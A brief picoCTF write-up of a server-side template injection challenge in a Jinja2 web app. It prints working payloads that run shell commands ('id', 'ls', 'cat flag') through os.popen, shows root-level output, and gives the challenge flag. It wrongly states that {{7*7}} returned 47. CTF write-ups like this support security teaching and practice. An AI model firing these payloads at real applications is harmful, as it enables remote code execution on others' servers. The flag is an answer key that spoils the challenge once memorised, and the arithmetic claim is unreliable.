Challenge Description
I made a cool website where you can announce whatever you want!
Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here!
Approach and Steps
{{7*7}} returned 47therefore it is Jinja2 (Python).
Ran {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
Got uid=0(root) gid=0(root) groups=0(root) in response, this means that the exploit works.
This means that i have RCE
Run: {{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}
Got __pycache__ app.py flag requirements.txt
Running {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} gives the flag.
Flag
Flag
picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_bd4cfc64}